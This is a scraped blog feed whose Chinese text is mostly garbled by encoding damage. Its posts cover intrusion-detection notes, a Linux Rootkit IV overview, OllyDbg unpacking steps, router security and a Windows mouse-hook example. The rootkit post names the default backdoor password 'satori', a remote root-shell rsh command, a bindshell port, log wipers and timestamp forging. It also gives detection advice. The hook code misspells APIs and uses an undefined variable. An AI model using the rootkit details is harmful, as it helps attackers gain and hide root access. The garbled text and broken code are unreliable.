入R技?//TODOhttp://www.shnenglu.com/momoxiao/archive/2010/04/10/112187.htmlSat, 10 Apr 2010 09:24:00 GMThttp://www.shnenglu.com/momoxiao/archive/2010/04/10/112187.htmlhttp://www.shnenglu.com/momoxiao/comments/112187.htmlhttp://www.shnenglu.com/momoxiao/archive/2010/04/10/112187.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/112187.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/112187.html整理from:  infosec.pku.edu.cn 
未完
--------------------------------------------

入R系l(
IDSQ?/span>Instruction Detection SystemQ:q行入R的软g和硬件的l合?/span>

入R的h和分c?/span>

审计技术:产生、记录ƈ查按旉序排列?strong style="mso-bidi-font-weight: normal">pȝ事g记录的过E?/span>

审计的目标:

­            定和保持系l活动中每个人的责Q

­            重徏事g

­            评估损失

­            系l的问题?/span>

­            提供有效的灾难恢?/span>

­            l织pȝ的不正当使用

审计的前提:有一个支配审计的规则?/strong>?/span>

 

规则集:通常以安全策略的形式明确表述?/span>

_审计Q风险和威胁分类?/span>

实时入R系l,提出反常zd与计机不正当用之间的相关性?/span>

ZL的入侉|?/span>

ZL和基?strong style="mso-bidi-font-weight: normal">|络入R的集成

 

?/span>Computer Security Threat Monitoring and Surveillance?/span>, James P. Anderson

《计机安全威胁监控与监视?/span>

­            _审计的目标在于从安全审计跟踪数据中消除冗余或无关的记录?/span>

­            计算机系l威胁分c:外部渗透、内部渗透和不法行ؓ?/span>

­            提出了利用审计数据跟t监视入侉|动的思想?/span>

 

NSM(Network Security Minitor)

­            W一ơ将|络?/strong>作ؓ审计数据的来源,因而可以在不将审计数据转换成统一格式的情况下监控异ŞL?/span>

­            两大阵营正式成立Q基于网l的IDS和基于主机的IDS

 

DIDS //???

最早试图把ZL和网l监视的Ҏ集成在一赗?/span>

 

IDS基本l构

三个功能部gQ信息收集、信息分析、信息处理?/span>

 

1Q信息收集:

pȝ或网l的日志文g。日志中记录了行为类型及其信息?/span>

?#8220;用户zd”Q?/span>

­            信息Q登陆,用户ID改变Q用户对文g的访问,授权Q认证信息等?/span>

­            不期望的行ؓQ重复登陆失败,dC期望的位|,非授权的企图讉K重要文g{?/span>

 

2Q信息分析:

模式匚wQ误用检)

­            收集到的信?strong style="mso-bidi-font-weight: normal">与已?/strong>|络入R和系l误用模式的数据库进行比?/strong>Q从而发现违背安全策略的行ؓ?/span>

­            一般一?strong style="mso-bidi-font-weight: normal">q攻模式可以用一?strong style="mso-bidi-font-weight: normal">q程Q如执行一条指令)或一?strong style="mso-bidi-font-weight: normal">输出Q如获得权限Q来表示。该q程可以很简单(如通过字符串匹?/strong>以寻找一个简单的条目或指?/strong>Q,也可以很复杂Q如利用正规的数学表辑ּ来表C?strong style="mso-bidi-font-weight: normal">安全状态的变化Q?/span>

l计分析Q异常检)

­            首先l系l对象(如用戗文件、目录和讑֤{)创徏一个统计描qͼl计正常使用时的一些测量属性(如访问次数、操作失败次数、g时等Q?/span>

­            量属性的q_值将被用来与|络、系l的行ؓq行比较QQ何观察值在正常范围之外Ӟp为有入R发生?/span>

完整性分析(往往用于事后分析Q?/span>

­            主要x某个文g或对象是否被更改。经常包括文件和目录的内容和属性,它在发现被更改的、被安装木马的应用程序方面特别有效?/span>

 

3Q信息处?/span>

 

入R的分类



2010-04-10 17:24 发表评论
]]>rootkitlDzzhttp://www.shnenglu.com/momoxiao/archive/2010/03/22/110298.htmlMon, 22 Mar 2010 07:50:00 GMThttp://www.shnenglu.com/momoxiao/archive/2010/03/22/110298.htmlhttp://www.shnenglu.com/momoxiao/comments/110298.htmlhttp://www.shnenglu.com/momoxiao/archive/2010/03/22/110298.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/110298.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/110298.html
好多人有一个误解,他们认ؓrootkit是用作获得系lroot讉K权限的工兗实际上Qrootkit是攻击者用来隐藏自qt迹和保留root讉K权限的工兗通常Q攻击者通过q程d获得root讉K权限Q或者首先密码猜或者密码强制破译的方式获得pȝ的访问权限。进入系l后Q如果他q没有获得root权限Q再通过某些安全漏洞获得pȝ的root权限。接着Q攻击者会在R入的L中安装rootkitQ然后他经帔R过rootkit的后门检查系l是否有其他的用L录,如果只有自己Q攻击者就开始着手清理日志中的有关信息。通过rootkit的嗅探器获得其它pȝ的用户和密码之后Q攻击者就会利用这些信息R入其它的pȝ?




什么是rootkit


Rootkit出现于二十世U?0q代初,?994q?月的一安全咨询报告中首先使用了rootkitq个名词。这安全咨询就是CERT-CC的CA-1994-01Q题目是Ongoing Network Monitoring AttacksQ最新的修订旉?997q??9日。从出现至今Qrootkit的技术发展非常迅速,应用来广泛,难度也来大。其中针对SunOS和Linux两种操作pȝ的rootkit最?树大招风:P)。所有的rootkit基本上都是由几个独立的程序组成的Q一个典型rootkit包括Q?



以太|?strong>嗅探?/strong>E程序,用于获得|络上传输的用户名和密码{信息?


Ҏ?strong>木马
E序Q例如:inetd或者loginQؓd者提供后门?


隐藏d者的目录和进E的E序Q例如:ps、netstat、rshd和ls{?


可能q包括一?strong>日志清理工具Q例如:zap、zap2或者z2Q攻击者用这些清理工具删除wtmp、utmp和lastlog{日志文件中有关自己行踪的条目?


一些复杂的rootkitq可以向d者提供telnet、shell和finger{服务?


q包括一些用来清?var/log?var/adm目录中其它文件的一些脚本?


d者用rootkit中的相关E序替代pȝ原来的ps、ls、netstat和df{程序,使系l管理员无法通过q些工具发现自己的踪qV接着使用日志清理工具清理pȝ日志Q消除自qt迹。然后,d者会l常地通过安装的后门进入系l查看嗅探器的日志,以发起其它的d。如果攻击者能够正地安装rootkitq合理地清理了日志文Ӟpȝ理员就会很隑֯觉系l已l被侵入Q直到某一天其它系l的理员和他联pL者嗅探器的日志把盘全部填满Q他才会察觉已经大祸临头了。但是,大多数攻击者在清理pȝ日志时不是非常小心或者干脆把pȝ日志全部删除了事Q警觉的pȝ理员可以根据这些异常情况判断出pȝ被R入。不q,在系l恢复和清理q程中,大多数常用的命o例如ps、df和ls已经不可信了。许多rootkit中有一个叫做FIX的程序,在安装rootkit之前Q攻击者可以首先用这个程序做一个系l二q制代码的快照,然后再安装替代程序。FIX能够Ҏ原来的程序伪造替代程序的三个旉?atime、ctime、mtime)、date、permission、所属用户和所属用L。如果攻击者能够准地使用q些优秀的应用程序,q且在安装rootkit时行}慎,׃让系l管理员很难发现?



LINUX ROOTKIT IV


前面说过Q大部分rootkit是针对Linux和SunOS的,下面我们介绍一个非常典型的针对Linuxpȝ的rootkit--Linux Rootkit IV。Linux Rootkit IV是一个开放源码的rootkitQ是Lord Somer~写的,?998q?1月发布。不q,它不是第一个Linux RootkitQ在它之前有lrk、lnrk、lrk2和lrk3{Linux Rootkit。这些rootkit包括常用的rootkitlgQ例如嗅探器、日志编?删除工具、和后门E序的?

l过q么多年的发展,Linux Rootkit IV功能变的来完善,h的特征也来多。不q,虽然它的代码非常庞大Q却非常易于安装和用,只要执行make install可以成功安装。如果你q要安装一个shadow工具Q只要执行make shadow install可以了。注意:Linux Rootkit IV只能用于Linux 2.x的内核。下面我们简单地介绍一下Linux Rootkit IV包含的各U工P详细的介l请参考其发布包的README文g?

隐藏入R者行t的E序

Z隐藏入R者的行踪QLinux Rootkit IV的作者可谓煞费心机,~写了许多系l命令的替代E序Q用这些程序代替原qpȝ命oQ来隐藏入R者的行踪。这些程序包括:



ls、find、du

q些E序会阻止显C入侵者的文g以及计算入R者文件占用的I间。在~译之前Q入侵者可以通过ROOTKIT_FILES_FILE讄自己的文件所处的位置Q默认是/dev/ptyr。注意如果在~译时用了SHOWFLAG选项Q就可以使用ls -/命o列出所有的文g。这几个E序q能够自动隐藏所有名字ؓQptyr、hack.dir和W4r3z的文件?


ps、top、pidof

q几个程序用来隐藏所有和入R者相关的q程?


netstat

隐藏?入指定IP地址或者端口的|络数据量?


killall

不会杀死被入R者隐藏的q程?


ifconfig

如果入R者启动了嗅探器,q个E序阻止PROMISC标记的显C,使系l管理员难以发现|络接口已经处于h模式下?


crontab

隐藏有关d者的crontab条目?


tcpd

L向日志中记录某些q接


syslogd

qo掉日志中的某些连接信?



木马E序

为本地用h供后门,包括Q?



chfn

提升本地普通用h限的E序。运行chfnQ在它提C入新的用户名Ӟ如果用户输入rookit密码Q他的权限就被提升ؓroot。默认的rootkit密码是satori?


chsh

也是一个提升本地用h限的E序。运行chshQ在它提C入新的shellӞ如果用户输入rootkit密码Q他的权限就被提升ؓroot?


passwd

和上面两个程序的作用相同。在提示你输入新密码Ӟ如果输入rookit密码Q权限就可以变成root?


login

允许使用M帐户通过rootkit密码d。如果用root帐户d被拒l,可以试一下rewt。当使用后门Ӟq个E序q能够禁止记录命令的历史记录?


木马|络监控E序

q些E序E用h供后门,可以向远E用h供inetd、rsh、ssh{服务,具体因版本而异。随着版本的升U,Linux Rootkit IV的功能也来强大,特征也越来越丰富。一般包括如下网l服务程序:



inetd

Ҏ伊inetdE序Qؓd者提供远E访问服务?


rshd

为攻击者提供远Eshell服务。攻击者用rsh -l rootkitpassword host command命o可以启动一个远Eroot shell?


sshd

为攻击者提供ssh服务的后门程序?


工具E序

所有不属于以上cd的程序都可以归如q个cdQ它们实C些诸如:日志清理、报文嗅探以及远Eshell的端口绑定等功能Q包括:



fix

文g属性伪造程?


linsniffer

报文嗅探器程序?


sniffchk

一个简单的bash shell脚本Q检查系l中是否正有一个嗅探器在运行?


wted

wtmp/utmp日志~辑E序。你可以使用q个工具~辑所有wtmp或者utmpcd的文件?


z2

utmp/wtmp/lastlog日志清理工具。可以删除utmp/wtmp/lastlog日志文g中有x个用户名的所有条目。不q,如果用于Linuxpȝ需要手工修改其源代码,讄日志文g的位|?


bindshell

在某个端口上l定shell服务Q默认端口是12497。ؓq程d者提供shell服务?




如何发现rootkit


很显Ӟ只有使你的网l非常安装让d者无隙可乘,才能是自q|络免受rootkit的媄响。不q,恐怕没有h能够提供q个保证Q但是在日常的网l管理维护中保持一些良好的习惯Q能够在一定程度上减小由rootkit造成的损失,q及时发现rootkit的存在?

首先Q不要在|络上用明文传输密码,或者用一ơ性密码。这P即你的pȝ已经被安装了rootkitQ攻击者也无法通过|络监听Q获得更多用户名和密码,从而避免入늚蔓g?

使用Tripwire和aide{检工兯够及时地帮助你发现攻击者的入RQ它们能够很好地提供pȝ完整性的查。这cd具不同于其它的入侉|工P它们不是通过所谓的d特征码来入侵行为,而是监视和检查系l发生的变化。Tripwire首先使用特定的特征码函数为需要监视的pȝ文g和目录徏立一个特征数据库Q所谓特征码函数是使用L的文件作入,产生一个固定大的数据(特征?的函数。入侵者如果对文gq行了修改,即文g大小不变Q也会破坏文件的特征码。利用这个数据库QTripwire可以很容易地发现pȝ的变化。而且文g的特征码几乎是不可能伪造的Q系l的M变化都逃不qTripwire的监?当然Q前提是你已l针对自qpȝ做了准确的配|?PQ关于Tripwire和aide的用请参考本站的相关文章)。最后,需要能够把q个特征码数据库攑ֈ安全的地斏V?




前一D|_写了几篇rootkit分析文章Q这权且作一pd文章的ȝQ到此ؓ止。但是在最q发布的Phrack58-0x07(Linux on-the-fly kernel patching without LKM)中实C个直接修改内核数据结构的rootkitQ因此决定写一个箋?P<br>


2010-03-22 15:50 发表评论
]]>[zz]常见脱壳知识http://www.shnenglu.com/momoxiao/archive/2009/12/14/103195.htmlMon, 14 Dec 2009 10:16:00 GMThttp://www.shnenglu.com/momoxiao/archive/2009/12/14/103195.htmlhttp://www.shnenglu.com/momoxiao/comments/103195.htmlhttp://www.shnenglu.com/momoxiao/archive/2009/12/14/103195.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/103195.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/103195.html2.POPAD Q出栈) 代表E序的出口点Q与PUSHAD惛_应,一般找到这个OEP在附近拉!
3.OEPQ程序的入口点,软g加壳是隐藏了OEPQ或者用了假的OEPQ,
只要我们扑ֈE序真正的OEPQ就可以立刻脱壳?

开始正式介l方法啦Q!
Ҏ一Q?
1.用OD载入Q不分析代码Q?
2.单步向下跟踪F8Q是向下跳的让它实现
3.遇到E序往回蟩的(包括循环Q,我们在下一句代码处按F4Q或者右健单M码,选择断点——运行到所选)
4.l色U条表示跌{没实玎ͼ不用理会Q红色线条表C转已l实玎ͼ
5.如果刚蝲入程序,在附q就有一个CALL的,我们F7跟进去,q样很快p到程序的OEP
6.在跟t的时候,如果q行到某个CALLE序p行的Q就在这个CALL中F7q入
7.一般有很大的蟩转,比如 jmp XXXXXX 或?JE XXXXXX 或者有RETE的一般很快就会到E序的OEP?

Ҏ二:
ESP定理脱壳QESP在OD的寄存器中,我们只要在命令行下ESP的硬件访问断点,׃一下来到程序的OEP了!Q?
1.开始就点F8Q注意观察OD右上角的寄存器中ESP有没出现?
2.在命令行下:dd 0012FFA4(指在当前代码中的ESP地址)Q按回RQ?
3.选种下断的地址Q下g讉KWORD断点?
4.按一下F9q行E序Q直接来C跌{处,按下F8Q到辄序OEPQ脱?

Ҏ三:
内存跟踪Q?
1Q用OD打开软gQ?
2Q点击选项——调试选项——异常,把里面的忽略全部√上!CTRL+F2重蝲下程序!
3Q按ALT+M,DA 打开内存镜象Q找到第一?rsrc.按F2下断点,
然后按SHIFT+F9q行到断点,接着再按ALT+M,DA 打开内存镜象Q找?RSRC上面的CODEQ按
F2下断点!然后按SHIFT+F9Q直接到辄序OEPQ脱壻I


Ҏ四:
一步到达OEPQ前辈们ȝ的经验)
1.开始按Ctrl+F,输入QpopadQ只适合数I包括ASPACKIQ然后按下F2QF9q行到此?
2.来到大蟩转处Q点下F8Q脱壳之Q?

Ҏ五:
1Q用OD打开软gQ?
2Q点击选项——调试选项——异常,把里面的√全部LQCTRL+F2重蝲下程序!
3Q一开是程序就是一个蟩转,在这里我们按SHIFT+F9Q直到程序运行,C从开始按F9到程?
q行的次敎ͼ
4QCTRL+F2重蝲E序Q按SHIFT+F9Q次CؓE序q行的次?1?
5Q在OD的右下角我们看见有一个SE 句柄Q这时我们按CTRL+GQ输入SE 句柄前的地址Q?
6Q按F2下断点!然后按SHIFT+F9来到断点处!
7Q去掉断点,按F8慢慢向下赎ͼ
8Q到辄序的OEPQ脱壻I


2009-12-14 18:16 发表评论
]]>
常用|址http://www.shnenglu.com/momoxiao/archive/2009/12/12/103034.htmlSat, 12 Dec 2009 03:14:00 GMThttp://www.shnenglu.com/momoxiao/archive/2009/12/12/103034.htmlhttp://www.shnenglu.com/momoxiao/comments/103034.htmlhttp://www.shnenglu.com/momoxiao/archive/2009/12/12/103034.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/103034.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/103034.html解密分析
看雪--解密分析入门基础知识
http://bbs.pediy.com/showthread.php?t=31840


|络攻防

查询WHOIS数据?/strong>
NIC的WHOIS数据?
http://www.internic.net/whois.html

 Uwhois
http://www.uwhois.com/

2009-12-12 11:14 发表评论
]]>
[zz]|络路由安全攻防对策分析及实?/title><link>http://www.shnenglu.com/momoxiao/archive/2009/12/11/103012.html</link><dc:creator>默</dc:creator><author>默</author><pubDate>Fri, 11 Dec 2009 14:50:00 GMT</pubDate><guid>http://www.shnenglu.com/momoxiao/archive/2009/12/11/103012.html</guid><wfw:comment>http://www.shnenglu.com/momoxiao/comments/103012.html</wfw:comment><comments>http://www.shnenglu.com/momoxiao/archive/2009/12/11/103012.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/momoxiao/comments/commentRss/103012.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/momoxiao/services/trackbacks/103012.html</trackback:ping><description><![CDATA[<p><font face=宋体 size=3>|络路由器的安全问题一直以来被大家谈论得比较多Q虽然我们看到的路由器入侵事件不多,因此在很多h的印象中Q\?Routing)只是选择通过互联|络从源节点向目的节点传输信息的通道Q其实\由器的安全隐患很多,只是׃一般黑客接触得不太频繁Q被d的事件很发生,但如果\由器被攻击,后果不堪设惟?</font></p> <p>  <strong>不可忽视的\由器安全</strong></p> <p>  路由?Router)是因特网上最为重要的讑֤之一Q正是遍布世界各地的C万计的\由器构成了因特网q个在我们的w边日夜不停地运转的巨型信息|络?#8220;桥梁”。在因特|上Q\由器扮演着<strong>转发数据?/strong>“驿站”的角Ԍ对于黑客来说Q利用\由器的漏z发h击通常是一件比较容易的事情Q攻击\由器?strong>费CPU周期Q误g息流量,使网l陷于瘫?/strong>Q通常好的路由器本w会采取一个好?strong>安全机制</strong>来保护自己,但是仅此一Ҏq远不够的,保护路由器安全还需要网员?strong>配置和管?/strong>路由器过E中采取相应的安全措施?/p> <p>  路由器数据流C意?/p> <p>  行的\由器大多是以g讑֤的Ş式存在的Q但是在某些情况下也用程序来实现“软g路由?#8221;Q两者的唯一差别只是执行的效率不同而已?strong>路由器一般至和两个|络相联</strong>QƈҎ它对所q接|络的状态决定每个数据包的传输\径。\由器生成q维护一张称?#8220;路由信息?#8221;的表|其中跟踪记录盔R其他路由器的地址和状态信息?/p> <p>  路由器用\׃息表q根?strong>传输距离</strong>?strong>通讯费用</strong>{优化算法来军_一个特定的数据包的最佳传输\径。正是这U特点决定了路由器的“?#8221;Q它能够Ҏ盔R|络的实际运行状况自动选择和调整数据包的传输情况,最大的努力以最优的路线和最的代h数据包传递出厅R\由器能否安全E_地运行,直接影响着因特|的zdQ不因Z么原因出现\由器L、拒l服务或是运行效率急剧下降Q其l果都将是灾难性的?/p> <p>  <strong>路由器的安全剖析</strong></p> <p>  路由器的安全性分两方面,一斚w?strong style="COLOR: red">路由器本w的安全</strong>Q另一斚w?strong style="COLOR: red">数据的安?/strong>。由于\由器是互联网的核心,是网l互q的关键讑֤Q所以\由器的安全要求比其他讑֤的安全性要求更高,L的安全漏z最多导致该L无法讉KQ\由器的安全漏z可能导致整个网l不可访问?/p> <p>  路由器的安全漏洞可能存在<strong style="COLOR: red">理</strong>上的原因?strong style="COLOR: red">技?/strong>上的原因。在理上,对\由器<strong>口o</strong>p糕的选择?strong>路由协议授权机制</strong>的不恰当使用、错误的<strong>路由配置</strong>都可能导致\由器工作出现问题Q技术上路由器的<strong>安全漏洞</strong>可能有恶意攻击,?strong>H听、流量分析、假冒、重发、拒l服务、资源非授权讉K、干扰、病?/strong>{攻凅R此外,q有<strong>软g技?/strong>上的漏洞Q诸?strong>后门、操作系l漏z、数据库漏洞、TCP/IP协议漏洞、网l服?/strong>{都可能会存在漏z?/p> <p>  Z使\由器?strong>合法信息完整、及时、安?/strong>地{发到目的圎ͼ许多路由器厂商开始在<strong>路由器中d安全模块</strong>Q比如将防火墙、VPN、IDS、防病毒、URLqo{技术引入\由器当中Q于是出C路由器与安全讑֤融合的趋ѝ从本质上讲Q增加安全模块的路由器,在\由器功能实现斚w与普通\由器没有区别Q所不同的是Q添加安全模块的路由器可?strong>通过加密、认证等技术手D增强报文的安全?/strong>Q与专用安全讑֤q行有效配合Q来提高路由器本w的安全性和所理|段的可用性?/p> <p>  而ؓ了保护\由器安全Q我们还必需考虑路由器的配置问题。一般来说\由器的配|方式可以通过?strong>LConsole口接l端</strong>配置;?strong>AUX口接Modem同电话网</strong>相连Q从?strong>在远端配|?/strong>;?strong>TCP/IP|上可通过仿真l端(virtual termianl)telnet配置</strong>;可以?strong>TFTP Server上下载配|?/strong>Q另外,q可以用|管工作站进行配|。\由器d造成的最大威胁是|络无法使用Q而且q类d需要动用大量靠q骨q网l的服务器。其实,路由器有一个操作系l,也是一个YӞ相对其他操作pȝ的技术性来_差距是非常明昄Q由于功能单一Q不考虑兼容性和易用性等Q核心固化,一般管理员不允许远E登录,加上了解路由器的人少得很Q所以它的安全问题不太明显,有时候偶出现死机状态,理员一般用reboot命o后,也就没什么问题了?/p> <p>  也正因ؓq样Q致使很多\由器的管理员对这个不怎么兛_Q只要网l畅通就可以了,因ؓ路由器通常都是厂家负责l护的。甚x些厂家ȝ附带一句说:“如果忘记了口令,请和l销商联pR?#8221;事实上,qUnix都有很多漏洞Q何况\由器脆弱的操作系l?当然路由?strong>一般是无法渗入?/strong>。因为,你无法远E登录,一般管理员都不会开的?strong>但是让\由器拒绝服务的漏z很?/strong>。而且Q很多管理员有个毛病Q他们往往?a target=_blank>Windows</a>的操作系l补丁打得比较勤Q但是对路由器的操作pȝ的补丁,很多理员都懒得ȝ?/p> <p>  <strong>路由器五大类安控技?/strong></p> <p>  <strong>讉K控制技?/strong>Q用户验证是实现用户安全防护的基技术,路由器上可以采用多种用户接入的控制手D,如PPP、Webd认证、ACL?02.1x协议{,保护接入用户不受|络dQ同时能够阻止接入用hd他用户和|络。基于CA标准体系的安全认证,进一步加问控制的安全性?/p> <p>  <strong>传输加密技?/strong>Q?strong>IPSec</strong>是\由器常用的协议,借助该协议,路由器支?strong>建立虚拟专用|?VPN</strong>)。IPSec协议包括<strong>ESP(Encapsulating Security Payload)装安全负蝲</strong>?strong>AH(Authentication Header)报头验证协议</strong>及IKEQ密钥管理协议等Q可以用在公共IP|络上确保数据通信的可靠性和完整性,能够保障数据<strong>安全I越公网而没有被侦听</strong>。由于IPSec的部|简便,只需安全通道两端的\由器或主机支持IPSec协议卛_Q几乎不需对网l现有基设施q行更动Q这正是IPSec协议能够保包括q程d、客h、服务器、电子邮件、文件传输及Web讉K{多U应用程序安全的重要原因?/p> <p> <strong> 防火墙防护技?/strong>Q采用防火墙功能模块的\由器h报文qo功能Q能够对所有接收和转发的报文进行过滤和查,查策略可以通过配置实现更改和管理。\由器q可以利用NAT/PAT功能隐藏内网拓扑l构Q进一步实现复杂的应用|关(ALG)功能Q还有一些\由器提供Z报文内容的防护。原理是当报文通过路由器时Q防火墙功能模块可以Ҏ文与指定的访问规则进行比较,如果规则允许Q报文将接受查,否则报文直接被丢弃,如果该报文是用于打开一个新的控制或数据q接Q防护功能模块将动态修Ҏ创徏规则Q同时更新状态表以允怸新创建的q接相关的报文,回来的报文只有属于一个已l存在的有效q接Q才会被允许通过?/p> <p>  <strong>入R技?/strong>Q在安全架构中,入R?IDS)是一个非帔R要的技术,目前有些路由器和高端交换机已l内|IDS功能模块Q内|入侉|模块需要\由器具备完善的端口镜?一对一、多对一)和报文统计支持功能?/p> <p>  <strong>HA(高可用?</strong>Q提高自w的安全性,需要\由器能够支持备䆾协议(如VRRP)和具有日志管理功能,以得网l数据具备更高的冗余性和能够获取更多的保障?/p> <p>  <strong> 入R路由器的手法及其对策</strong></p> <p>  通常来说Q黑客攻击\由器的手D与袭击|上其它计算机的手法大同异Q因Z严格的意义上讲\由器本n是一台具备特D命的电脑Q虽然它可能没有Z通常熟识的PC那样的外观。一般来Ԍ黑客针对路由器的d主要分ؓ以下两种cdQ一是通过某种手段或途径获取理权限Q?strong>直接侵入到系l的内部</strong>;一是采?strong>q程d的办法造成路由器崩溃死机或是运行效率显著下?/strong>。相较而言Q前者的隑ֺ要大一些?/p> <p>  在第一U入侉|法中Q黑客一般是利用pȝ用户?strong>_心</strong>或已知的<strong>pȝ~陷</strong>(例如pȝ软g中的“臭虫”)获得q入pȝ?strong>讉K权限</strong>Qƈ通过一pdq一步的行动最l获?strong>񔽎理员权?/strong>。黑客一般很难一开始就获得整个pȝ的控制权Q在通常的情况下Q这是一?strong>逐渐升的入侵过E?/strong>。由于\由器不像一般的pȝ那样设有众多的用戯̎P而且l常使用安全性相对较高的专用软gpȝQ所以黑客要惌取\由器pȝ的管理权相对于入侵一般的Lp困难得多?/p> <p>  因此Q现有的针对路由器的黑客d大多数都可以归入W二cLLD늚范畴。这U攻ȝ最l目的ƈ非直接R入系l内部,而是通过向系l发送攻L数据包或在一定的旉间隔里,向系l发送数量巨大的“垃圾”数据包,以此大量耗费路由器的pȝ资源Q其不能正常工作,甚至d崩溃?/p> <p>  路由器是内部|络与外界的一个通信出口Q它在一个网l中充当着q带宽和{换IP地址的作用,实现量外部IP地址数量让内部多台电脑同时访问外|,一旦黑客攻陯\由器Q那么就掌握了控制内部网l访问外部网l的权力Q而且如果路由器被黑客使用拒绝服务dQ将造成内部|络不能讉K外网Q甚至造成|络瘫痪。具体来_我们可以实施下面的对{:</p> <p>  Z防止外部<strong>ICMP重定向欺?/strong>Q我们知道攻击者有时会利用ICMP重定向来对\由器q行重定向,本应送到正确目标的信息重定向到它们指定的讑֤Q从而获得有用信息。禁止外部用户用ICMP重定向的命o是:interface serial0 no ip redirects?/p> <p>  在防?strong>外部源\由欺?/strong>Ӟ我们知道源\由选择是指?strong>用数据链路层信息来ؓ数据报进行\由选择</strong>。该技术跨了|络层的路由信息Q<strong>入R者可以ؓ内部|的数据报指定一个非法的路由</strong>Q这?strong>原本应该送到合法目的地的数据报就会被送到入R者指定的地址</strong>。禁止用源路由的命令:no ip source-route?/p> <p>  如何防止<strong>盗用内部IP地址</strong>?׃d者通常可能会盗用内部IP地址q行非法讉KQ针对这一问题Q可以利用Cisco路由器的ARP命o<strong>固定IP地址l定到某一MAC地址</strong>之上。具体命令:arp 固定IP地址 MAC地址 arpa?/p> <p>  而要在源站点<strong>防止smurf</strong>Q关键则?strong>L所有的向内回显h</strong>Q这p<strong>防止路由器将指向|络q播地址的通信映射到局域网q播地址</strong>。可以在LAN接口方式中输入命令:no ip directed-broadcast?/p> <img src ="http://www.shnenglu.com/momoxiao/aggbug/103012.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/momoxiao/" target="_blank">默</a> 2009-12-11 22:50 <a href="http://www.shnenglu.com/momoxiao/archive/2009/12/11/103012.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>[zz]HOOKhttp://www.shnenglu.com/momoxiao/archive/2009/10/22/99229.htmlThu, 22 Oct 2009 13:15:00 GMThttp://www.shnenglu.com/momoxiao/archive/2009/10/22/99229.htmlhttp://www.shnenglu.com/momoxiao/comments/99229.htmlhttp://www.shnenglu.com/momoxiao/archive/2009/10/22/99229.html#Feedback0http://www.shnenglu.com/momoxiao/comments/commentRss/99229.htmlhttp://www.shnenglu.com/momoxiao/services/trackbacks/99229.html钩子函数

钩子函数可以截获q处?u>其他应用E序的消?/span>。每当特定的消息发出Q在没有到达目的H口前,钩子E序先捕获该消息,亦即钩子函数先得到控制权。这旉子函数即可以加工处理Q改变)该消息,也可以不作处理而l传递该消息Q还可以强制l束消息的传递?br>钩子的种cd多,每种钩子可以截获q处理相应的消息Q如键盘钩子可以截获键盘消息Q外壳钩子可以截取、启动和关闭应用E序的消息等
关于HOOK
Hooks
A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach the target window procedure.

安装一个HOOKQSetWindowsHookEx
ҎU类型的钩子?span style="background-color: #c0c0c0;">pȝ来维护一个钩子链Q最q安装的钩子攑֜铄开始,而最先安装的钩子攑֜最后,也就?span style="background-color: #c0c0c0;">后加入的先获得控制权?br>The SetWindowsHookEx function installs an application-defined hook procedure into a hook chain. You would install a hook procedure to monitor the system for certain types of events. These events are associated either with a specific thread or with all threads in the same desktop as the calling thread.
HHOOK SetWindowsHookEx(
int idHook,        // hook type.h看MSDN获得详细信息
HOOKPROC lpfn,     // hook procedure
HINSTANCE hMod,    // handle to application instance
DWORD dwThreadId   // thread identifier
);

得到控制权的钩子函数在完成对消息的处理后Q如果想要该消息l箋传递,那么它必调用另外一个SDK中的API函数CallNextHookEx来传递它?br>(对一个事件处理的hook可能有多个,它们成链Ӟ使用CallNextHookEx一U一U地调用。简单解释过来就?#8220;调用下一个HOOK” )
CallNextHookEx
The CallNextHookEx function passes the hook information to the next hook procedure in the current hook chain. A hook procedure can call this function either before or after processing the hook information.
LRESULT CallNextHookEx(
HHOOK hhk,      // handle to current hook
int nCode,      // hook code passed to hook procedure
WPARAM wParam, // value passed to hook procedure
LPARAM lParam   // value passed to hook procedure
);

hook处理函数
LRESULT CALLBACK HookProc(
int nCode,
WPARAM wParam,
LPARAM lParam
);

取消HOOK
UnhookWindowsHookEx
The UnhookWindowsHookEx function removes a hook procedure installed in a hook chain by the SetWindowsHookEx function.
BOOL UnhookWindowsHookEx(
HHOOK hhk   // handle to hook procedure
);

 

CZQ?br>[code]
// 监视鼠标消息
// hook处理函数声明
LRESULT CALLBACK MyMouseProc(int nCode, WPARAM wParam, LPARAM lParam);
static BOOL StartWatchingMouse(); // 开始监?br>static void StopWatchingMouse();    // l束
static HHOOK hHook = NULL;    //hook指针
/*======================================================
*Function:StartWatchingMouse()
*Author:wuhuiran 05-7-23
*Desc:开始监视鼠?br>*Record:
--------------------------------------------------------
========================================================*/
BOOL StartWatchingMouse()
{
hHook = SetWindowHookEx(WM_MOUSE, (HOOKPROC) MyMouseProc,
   (HINSTANCE) NULL, GetCurrentThreadId());
  
if(!hHook)
{
   return FALSE;
}

return TRUE;

}

/*======================================================
*Function:StartWatchingMouse()
*Author:wuhuiran 05-7-23
*Desc:取消监视鼠标
*Record:
--------------------------------------------------------
========================================================*/
void StopWatchingMouse()
{
if(hHook)
{
   UnHookWindowHookEx(hHook);
   hHook = NULL;
}
}

/*======================================================
*Function:StartWatchingMouse()
*Author:wuhuiran 05-7-23
*Desc:HOOK处理函数
*Record:
--------------------------------------------------------
========================================================*/
LRESULT CALLBACK MyMouseProc(int nCode, WPARAM wParam, LPARAM lParam)
{
if(nCode < 0)
{
   return CallNextHookEx(hHook, nCode, wParam, lParam);
  
}

MOUSEHOOKSTRUCT *pMouseHookStruct;   //鼠标HOOKl构?br>pMouseHookStruct = (MOUSEHOOKSTRUCT *)lParam;

POINT pt = pMouseHookStruct->pt;
//动一下鼠标就会显C鼠标位|?br>CString strMsg;
strMsg.Format("x:\t%d\ny:\t%d", pt.x, pt.y);
AfxMessageBox(strMsg);

return CallNextHookEx(myHook, nCode, wParam, lParam);
}
[/code]

